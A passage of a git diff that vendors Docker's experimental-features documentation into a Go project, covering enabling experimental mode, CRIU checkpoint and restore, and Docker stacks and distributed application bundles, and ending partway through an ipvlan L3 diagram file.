zro77oJ45lA+;3SyC>wT8_=OsUE|1OgTR~ncer@z#3)YaYQ*?#Wrx<glxc8Js{yD-O
z{_`F^?=@f$_#j2?*h%L;Q9uQYUH6MmNlrA`(m-#In##3dh)cP#V{6{|GGRFdeN!~w
zOVHwCa||Rv45pQ-UJAn#O*dHg1I4~80h*0;KA&9}tV=s1g#C%b@jf6&eo)@4OmQuE
zG7oPsPx6`#e7sv@B*vGOuf@m9F6;zeX19`UBonB0>abQv(>BcRlJOplPc+`&byEqu
zSe;z0F6W5sjW{-LbqNo*Y8cT}Bb@z~<Z*OCPxbs1=FbJOHV<|Gob4nuD+{mGDskfy
zsw(m-%zb=IH4s;!wHXrCgYh?*1`9D$=B9EcY8a5HPfkpCk#%-krl2!(Wb=c15cH9X
z*Iig9x%W!M#X+k-<q-Wt6ZP!9=bTy8e{sbeyj1W2nnt|>yI9DLEWN1oWe59z_@ipp
zLstkhb7SjtG)K5p8T!^o*bGI%<be!Wi=IQkU5<hDS?vcb{^L%86J^lDKU}=t2Yxfe
zeNbEt0XX|4mEHOD-rz4%R(){&#>V$0FtNoMIlpau7F(lUkM%3oy@Jgwn}2mJpbVsv
zYUL1a#7{fVYxYs?5QBa>1dF#(YQhTY<{rU_!+3F{U(;V?U7m}mCSv`f%>`KB;P!kz
zg}Xt&!&;r5fbo;^e-?ODNKx7pBCMv5#Q=9?Z@%340qiWT_HhME+>aGnjB0hEx9mrZ
zIf7LeNftg$1IABOR1cnJ&qr69m%R&KzW)Zx^)>eOoLqsYeKH1V{eGaYc$UzK%N(u$
z8MW|qaibkx?1xOd_cB&)9AYUp%jDLJF*q<0_OQFoT5UI4v*lLd)Ct+4ihEmPIr4mv
zT3^spo(F~bh_%?WfMyxf;(r^`B|7|(5^YW+;rXpVt6mmzj@;~|;6wte-q-K0Yp_`(
zJ;nRYI;I)n>4&$m?y~DBjcs??K>Dz|ef!&(xG(F?8Kqn13naL`$21$cW<FtkSmpyT
z&F9N4D*V6|@Z@pBLcHXwwCe(Q9RcCV4iR=aCSRp5g3tuUQAs8r-?h7$WO%aL8D|BO
zIQ{l^!IKF)+f>{lQy$eZwAn~26|FVhQ)&w*@?T;1__?~Q@@RdnRBxDK)W08rl#y?Q
zHt6|Y@KA+1?$y3I0R|<VptnSoS9aGL3bWMemp?Loa>XEtQ~<k!FQc=&!GNxjv}?0W
zfP#BVH8rp~`Hqfxj*Y)X765ncP~rzdTgJpRL`?d#QpzlnNPsTd*|ia%HF|qI(Zals
zGO=E7jzeFe;l&FX40+;}M^)$SU>@(1K^*1>=HW?FL;Gfrn>2X2{)Pq4;z=^FGBy{4
zfjcO)iMEO5!G5H(2PbPs`79(Gg*|FPTSn##qwNj0e}D*6oWkc+NHkG`3@+qjcLh$g
z6T8BcIDh5pr@KhK)%}u<*)k0r-o>NFVRBhT%@AQ;O!g*VVZ;OS{t5M+4pX8jTz!fP
zUT2PV&V>2OR%#=s5Hr<B>r=k$-fVU2zn>Jc>pmcCD1_#PBHiv8-}q9RPJ1Z_sK3Y#
zA27HxB}mSrs&X~!2ZtFIUal{SOK+u$jHlZ&q4q)-v2%g|cEWybWn=rLZAxos;_5{;
z%tB8~2Eq>yW6O^wzAD|gfDOFqkjc<U@v==dbdlTJF8|%xH%c8hX(84-UR6Ed!u_0e
z;_#2U$!7<#GI_=jH)&*F`gY>0CGjmeiY_{XOG^?&-Q6$HP^*dnBu3^{n^e50%;zmk
zwc;)Dh{=LBWv_i3!meuG>@sfew~lS&oWM4(iks3~-(?eX81YZI(rwzn7q8e4y$L78
z`4+D#Dl)qaN59RF&-9O!cN;@5)2r>hJYeq;n$uAs@2Z01pYA*HDdD&aosaAzKvx8E
z;z|5zUuN5_;k4*HQvgTq^b((I=_2NFM<H(|q<P4vG%NhGhoTFzw>6PVep|fAkTQCl
z&iA*FJ-;u>J+8DJ8E=4sJW@%+GeXvl%);76DFJM__y<;;3%*z(2_yT_d4Q#h(SXz0
z6TG{`sFOjtl5o`&3Ged>L{cVrz63hs^eEUZ6D*s7n5fFr7<#%-3rYTGcaKbhthnSZ
zvMn0>usnD8z?m8QpU?lM#i}y)Z0=qUB#J$xgB`xiv%~V#F$kHg5_n%lgUE{WATED9
z5Z37T+_QJI?|5hYl<At4I&UJPUbh{=s)NLqFyeGn4-MttLcS@&rDtsf6$9gbgqqq5
zUR?ZalFnGZ?_N$wy3YI;67jblFu2b}tVw5cA@=Ucykc2=y;K6d@u_8vPcchqyDfM(
zi|sl-N}`LN=)A*4Jh54SSS$8Yq4a=T5`%W;d3g1mx=OiYLLGF4143l!+TfSqRq{U)
zwdZfG=kO+0)E-B6mDVPXxzYR0`|(T2G7rGQak3Lu!RU}Sl)a;`Gyl5A&rPrH5mn<<
zyK+SD<1soZR@8dpcT0?zV;XeWJkVhHF>Fr(_elO;+!W<U=z7<{W@vZc;CLLt{$-tw
zzJ;xf?hmzok@d}91nkN===OfdhbvbH<!MVhckWBFkY%7YYx7Nsa_@{$!q)uYtUZIB
zwT~UQJ=fhDAryU0j<jg$tXF%Xl^A8LJ-8%w`+|**X9BK~Q=S{SUG*$x)aDN#y7Ol-
z&B2S%98=ilGwm>HpPS#rxhmNpG5SS98N{B=1haE1SAlEl)d)k7SZm;xWjT-*RY{tG
zN(H#)Vd*7mhLj(sb8{+v^nR8Rgdr@)pL~OMvWo+jlthKWH_7rkcSK^o7TpqSt26HQ
zv9Lq=2#t$3r9$CiI%#aWbC8{!<J{wS(Alel2b2%;KW$J)6`^D3@8h{y+zaf>1MS>1
z5UZ`lX<g0zK^dK}DDK<N$r!xM!)wG#@h)NGxF&(xrcQYCJ*y@gPonT7UhLRjQ#{)Z
ztCge<*XP)3X578QT$JPV-7X(-So)42{WTUzDR$EDX$XF>yO^rgtvE2oaic!Qw{AkN
z6!GotTQ_1whY#DPT1GVMS4Yz^iWhhffQ4ra^;Tj+mN*O>C&wdZ3%T64jdoSXNnenO
zea@%o;r3TW=&=scbNiV<GZyi-@n-W|XutZwu5SlgNoHSug>I5=Rkvf{pY+tp_o;Bx
zO6NISp=xBP=3DE}=6hZD-a13GU(K<o&5z_%X6nU`6z_5ykV3QTr5SG)ye_@;WUr(Y
zJvyadn7>Y^;wTpDEg?TV(7+$NWG6Sfq@BBZplR|%&spuHx|0@}%*`RMavjdMgtNFi
z?6c5OqGt41{y;bM{lvvxTU*vUA|^2TBJ}1zFE$41^u5>}a$N#EgK7jS@T2(%2G>^u
zMG{EO*o?=r8ydTN9h#9jGMgK))f7{VAG*3k1F=q=N+F!wD9-r_E9JenHtxz0L8~e#
z@$=-I0ZOD$dj8A3`-#!zl1viIELeCBWT;@>EhpCqK4;Vcq!0WX#j%{b>K6JJiZpFg
zLP9l+3-<Yc(|;YeJn4BXO%rrvHWWa)YHW%LWOf)%>z;xQ$p+im5E|cX$26GUzO;&G
zuvt5i4v?-+;G|D!5DyOUcJ{ngAt%H4hV-q0pq0g`pm8KZle(5EB=8fd^L-()yOD^#
zcq4HkpO)Razp>a{d64bm$vt<nAWINq9iLIJ86@>2#!sCF0X;V_57i1&Q^k5mQoB|V
z<(W__{wk;H!y4gdG!mfR-L1s1{wXPs7V}I*f~fHizL@>v=egE;{|Fp0oP2B<MxeN?
zd(SNfdOlXyce|G9U24Hz&9|Kp=I6F=LX=4W8u|QPMiq_a-mlx2e3S6()>3DGsrcsO
zmPqMH9F@IC++&PuoY2+6lP~d~ZW&j^aaF|~zOE1X+;!6}6HgrY=xS-#(z$}T{tbV@
z>=beW^pmP-9yg&@(NeWi!rjRfO+zyM)>5|<hdo&g7<#<Jxm{a|M=wo@f38+V`7Jg_
zD+|z=@~OQ4?OVBL5D|YxEz8^6LC3+NX4#n4GLsfIq|YB;q53Pq*uk60#yQ2=JYSQt
zN_?hoT2e3mSiGzmuiW4GqN<*~_u;*lj1^SQ6h}W+Uez7l)5v>4tnk1d8+ez;yd#xM
znmNhT$l%P&D%+dLk>Wa$Q!3^Mn5S5aa?m{%g`Ky@Cq~JA5=UvjEDE+oma&EF1bEdv
z&`!H>_o}HyFr4)2gsQ>*``6L#I43*9KSz+?morzu{~h`t6(dL&;hE-9;`#3^Ej2yW
IT4fCOKM4~1IsgCw

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/experimental/README.md b/vendor/github.com/docker/docker/experimental/README.md
new file mode 100644
index 0000000000..b57a5d1294
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/README.md
@@ -0,0 +1,44 @@
+# Docker Experimental Features
+
+This page contains a list of features in the Docker engine which are
+experimental. Experimental features are **not** ready for production. They are
+provided for test and evaluation in your sandbox environments.
+
+The information below describes each feature and the GitHub pull requests and
+issues associated with it. If necessary, links are provided to additional
+documentation on an issue.  As an active Docker user and community member,
+please feel free to provide any feedback on these features you wish.
+
+## Use Docker experimental
+
+Experimental features are now included in the standard Docker binaries as of
+version 1.13.0.
+For enabling experimental features, you need to start the Docker daemon with
+`--experimental` flag.
+You can also enable the daemon flag via `/etc/docker/daemon.json`. e.g.
+
+```json
+{
+    "experimental": true
+}
+```
+
+Then make sure the experimental flag is enabled:
+
+```bash
+$ docker version -f '{{.Server.Experimental}}'
+true
+```
+
+## Current experimental features
+
+ * [External graphdriver plugins](../docs/extend/plugins_graphdriver.md)
+ * [Ipvlan Network Drivers](vlan-networks.md)
+ * [Docker Stacks and Distributed Application Bundles](docker-stacks-and-bundles.md)
+ * [Checkpoint & Restore](checkpoint-restore.md)
+
+## How to comment on an experimental feature
+
+Each feature's documentation includes a list of proposal pull requests or PRs associated with the feature. If you want to comment on or suggest a change to a feature, please add it to the existing feature PR.
+
+Issues or problems with a feature? Inquire for help on the `#docker` IRC channel or on the [Docker Google group](https://groups.google.com/forum/#!forum/docker-user).
diff --git a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md
new file mode 100644
index 0000000000..7e609b60ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md
@@ -0,0 +1,88 @@
+# Docker Checkpoint & Restore
+
+Checkpoint & Restore is a new feature that allows you to freeze a running
+container by checkpointing it, which turns its state into a collection of files
+on disk. Later, the container can be restored from the point it was frozen.
+
+This is accomplished using a tool called [CRIU](http://criu.org), which is an
+external dependency of this feature. A good overview of the history of
+checkpoint and restore in Docker is available in this
+[Kubernetes blog post](http://blog.kubernetes.io/2015/07/how-did-quake-demo-from-dockercon-work.html).
+
+## Installing CRIU
+
+If you use a Debian system, you can add the CRIU PPA and install with apt-get
+[from the criu launchpad](https://launchpad.net/~criu/+archive/ubuntu/ppa).
+
+Alternatively, you can [build CRIU from source](http://criu.org/Installation).
+
+You need at least version 2.0 of CRIU to run checkpoint/restore in Docker.
+
+## Use cases for checkpoint & restore
+
+This feature is currently focused on single-host use cases for checkpoint and
+restore. Here are a few:
+
+- Restarting the host machine without stopping/starting containers
+- Speeding up the start time of slow start applications
+- "Rewinding" processes to an earlier point in time
+- "Forensic debugging" of running processes
+
+Another primary use case of checkpoint & restore outside of Docker is the live
+migration of a server from one machine to another. This is possible with the
+current implementation, but not currently a priority (and so the workflow is
+not optimized for the task).
+
+## Using checkpoint & restore
+
+A new top level command `docker checkpoint` is introduced, with three subcommands:
+- `create` (creates a new checkpoint)
+- `ls` (lists existing checkpoints)
+- `rm` (deletes an existing checkpoint)
+
+Additionally, a `--checkpoint` flag is added to the container start command.
+
+The options for checkpoint create:
+
+    Usage:  docker checkpoint create [OPTIONS] CONTAINER CHECKPOINT
+
+    Create a checkpoint from a running container
+
+      --leave-running=false    Leave the container running after checkpoint
+      --checkpoint-dir         Use a custom checkpoint storage directory
+
+And to restore a container:
+
+    Usage:  docker start --checkpoint CHECKPOINT_ID [OTHER OPTIONS] CONTAINER
+
+
+A simple example of using checkpoint & restore on a container:
+
+    $ docker run --security-opt=seccomp:unconfined --name cr -d busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done'
+    > abc0123
+
+    $ docker checkpoint create cr checkpoint1
+
+    # <later>
+    $ docker start --checkpoint checkpoint1 cr
+    > abc0123
+
+This process just logs an incrementing counter to stdout. If you `docker logs`
+in between running/checkpoint/restoring you should see that the counter
+increases while the process is running, stops while it's checkpointed, and
+resumes from the point it left off once you restore.
+
+## Current limitation
+
+seccomp is only supported by CRIU in very up to date kernels.
+
+External terminal (i.e. `docker run -t ..`) is not supported at the moment.
+If you try to create a checkpoint for a container with an external terminal, 
+it would fail:
+
+    $ docker checkpoint create cr checkpoint1
+    Error response from daemon: Cannot checkpoint container c1: rpc error: code = 2 desc = exit status 1: "criu failed: type NOTIFY errno 0\nlog file: /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log\n"
+    
+    $ cat /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log
+    Error (mount.c:740): mnt: 126:./dev/console doesn't have a proper root mount
+
diff --git a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md
new file mode 100644
index 0000000000..b777c3919c
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md
@@ -0,0 +1,202 @@
+# Docker Stacks and Distributed Application Bundles
+
+## Overview
+
+Docker Stacks and Distributed Application Bundles are experimental features
+introduced in Docker 1.12 and Docker Compose 1.8, alongside the concept of
+swarm mode, and Nodes and Services in the Engine API.
+
+A Dockerfile can be built into an image, and containers can be created from
+that image. Similarly, a docker-compose.yml can be built into a **distributed
+application bundle**, and **stacks** can be created from that bundle. In that
+sense, the bundle is a multi-services distributable image format.
+
+As of Docker 1.12 and Compose 1.8, the features are experimental. Neither
+Docker Engine nor the Docker Registry support distribution of bundles.
+
+## Producing a bundle
+
+The easiest way to produce a bundle is to generate it using `docker-compose`
+from an existing `docker-compose.yml`. Of course, that's just *one* possible way
+to proceed, in the same way that `docker build` isn't the only way to produce a
+Docker image.
+
+From `docker-compose`:
+
+```bash
+$ docker-compose bundle
+WARNING: Unsupported key 'network_mode' in services.nsqd - ignoring
+WARNING: Unsupported key 'links' in services.nsqd - ignoring
+WARNING: Unsupported key 'volumes' in services.nsqd - ignoring
+[...]
+Wrote bundle to vossibility-stack.dab
+```
+
+## Creating a stack from a bundle
+
+A stack is created using the `docker deploy` command:
+
+```bash
+# docker deploy --help
+
+Usage:  docker deploy [OPTIONS] STACK
+
+Create and update a stack from a Distributed Application Bundle (DAB)
+
+Options:
+      --file   string        Path to a Distributed Application Bundle file (Default: STACK.dab)
+      --help                 Print usage
+      --with-registry-auth   Send registry authentication details to Swarm agents
+```
+
+Let's deploy the stack created before:
+
+```bash
+# docker deploy vossibility-stack
+Loading bundle from vossibility-stack.dab
+Creating service vossibility-stack_elasticsearch
+Creating service vossibility-stack_kibana
+Creating service vossibility-stack_logstash
+Creating service vossibility-stack_lookupd
+Creating service vossibility-stack_nsqd
+Creating service vossibility-stack_vossibility-collector
+```
+
+We can verify that services were correctly created:
+
+```bash
+$ docker service ls
+ID            NAME                                     MODE         REPLICAS    IMAGE
+29bv0vnlm903  vossibility-stack_lookupd                replicated   1/1         nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4awt47624qwh  vossibility-stack_nsqd                   replicated   1/1         nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4tjx9biia6fs  vossibility-stack_elasticsearch          replicated   1/1         elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
+7563uuzr9eys  vossibility-stack_kibana                 replicated   1/1         kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
+9gc5m4met4he  vossibility-stack_logstash               replicated   1/1         logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
+axqh55ipl40h  vossibility-stack_vossibility-collector  replicated   1/1         icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
+```
+
+## Managing stacks
+
+Stacks are managed using the `docker stack` command:
+
+```bash
+# docker stack --help
+
+Usage:  docker stack COMMAND
+
+Manage Docker stacks
+
+Options:
+      --help   Print usage
+
+Commands:
+  config      Print the stack configuration
+  deploy      Create and update a stack
+  ls          List stacks
+  rm          Remove the stack
+  services    List the services in the stack
+  tasks       List the tasks in the stack
+
+Run 'docker stack COMMAND --help' for more information on a command.
+```
+
+## Bundle file format
+
+Distributed application bundles are described in a JSON format. When bundles
+are persisted as files, the file extension is `.dab` (Docker 1.12RC2 tools use
+`.dsb` for the file extension—this will be updated in the next release client).
+
+A bundle has two top-level fields: `version` and `services`. The version used
+by Docker 1.12 tools is `0.1`.
+
+`services` in the bundle are the services that comprise the app. They
+correspond to the new `Service` object introduced in the 1.12 Docker Engine API.
+
+A service has the following fields:
+
+<dl>
+    <dt>
+        Image (required) <code>string</code>
+    </dt>
+    <dd>
+        The image that the service will run. Docker images should be referenced
+        with full content hash to fully specify the deployment artifact for the
+        service. Example:
+        <code>postgres@sha256:f76245b04ddbcebab5bb6c28e76947f49222c99fec4aadb0bb
+        1c24821a 9e83ef</code>
+    </dd>
+    <dt>
+        Command <code>[]string</code>
+    </dt>
+    <dd>
+        Command to run in service containers.
+    </dd>
+    <dt>
+        Args <code>[]string</code>
+    </dt>
+    <dd>
+        Arguments passed to the service containers.
+    </dd>
+    <dt>
+        Env <code>[]string</code>
+    </dt>
+    <dd>
+        Environment variables.
+    </dd>
+    <dt>
+        Labels <code>map[string]string</code>
+    </dt>
+    <dd>
+        Labels used for setting meta data on services.
+    </dd>
+    <dt>
+        Ports <code>[]Port</code>
+    </dt>
+    <dd>
+        Service ports (composed of <code>Port</code> (<code>int</code>) and
+        <code>Protocol</code> (<code>string</code>). A service description can
+        only specify the container port to be exposed. These ports can be
+        mapped on runtime hosts at the operator's discretion.
+    </dd>
+
+    <dt>
+        WorkingDir <code>string</code>
+    </dt>
+    <dd>
+        Working directory inside the service containers.
+    </dd>
+
+    <dt>
+        User <code>string</code>
+    </dt>
+    <dd>
+        Username or UID (format: <code>&lt;name|uid&gt;[:&lt;group|gid&gt;]</code>).
+    </dd>
+
+    <dt>
+        Networks <code>[]string</code>
+    </dt>
+    <dd>
+        Networks that the service containers should be connected to. An entity
+        deploying a bundle should create networks as needed.
+    </dd>
+</dl>
+
+The following is an example of bundlefile with two services:
+
+```json
+{
+	"Version": "0.1",
+	"Services": {
+		"redis": {
+			"Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce",
+			"Networks": ["default"]
+		},
+		"web": {
+			"Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d",
+			"Networks": ["default"],
+			"User": "web"
+		}
+	}
+}
+```
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy
new file mode 100644
index 0000000000..bf0512af76
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy
@@ -0,0 +1 @@
+{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":447,"height":422,"nodeIndex":326,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":9,"y":10.461511948529278},"max":{"x":447,"y":421.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":12.0,"y":200.0,"rotation":0.0,"id":276,"width":434.00000000000006,"height":197.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":275.0,"y":8.93295288085936,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":14,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[82.0,295.5670471191406],[-4.628896294384617,211.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":285.0,"y":18.93295288085936,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":15,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":316,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-204.0,285.5670471191406],[-100.37110370561533,201.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":203.5,"rotation":0.0,"id":267,"width":116.0,"height":16.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":16,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-family:Arial;\">Docker Host</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":28.93295288085936,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":17,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":290,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[217.5,167.06704711914062],[219.11774189711457,53.02855906766992]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":57.51435447730654,"y":10.461511948529278,"rotation":0.0,"id":246,"width":343.20677483961606,"height":143.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":18,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":55.19999694824217,"rotation":0.0,"id":262,"width":262.0,"height":75.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":22,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:13px;\">Unless notified about the container networks, the physical network does not have a route to their subnets</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;font-weight:bold;\">Who has 10.16.20.0/24?</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;font-weight:bold;\">Who has 10.1.20.0/24?</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.0,"y":403.5,"rotation":0.0,"id":282,"width":442.0,"height":18.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:16px;font-style:italic;\">Containers can be on different subnets and reach each other</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":252.5,"rotation":0.0,"id":288,"width":238.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:20px;font-weight:bold;\">&nbsp;Ipvlan&nbsp;</span><span style=\"font-size:20px;font-weight:bold;\">L3 Mode</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":172.0,"rotation":0.0,"id":290,"width":207.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":3.568965517241383,"y":0.0,"rotation":0.0,"id":291,"width":199.86206896551747,"height":42.0,"uid":null,"order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-weight:bold;\">Eth0</span></p><p style=\"text-align:center;\"><span style=\"font-weight:bold;\">192.168.50.10/24</span></p><p style=\"text-align:center;\"><span style=\"\">Parent interface acts as a <span 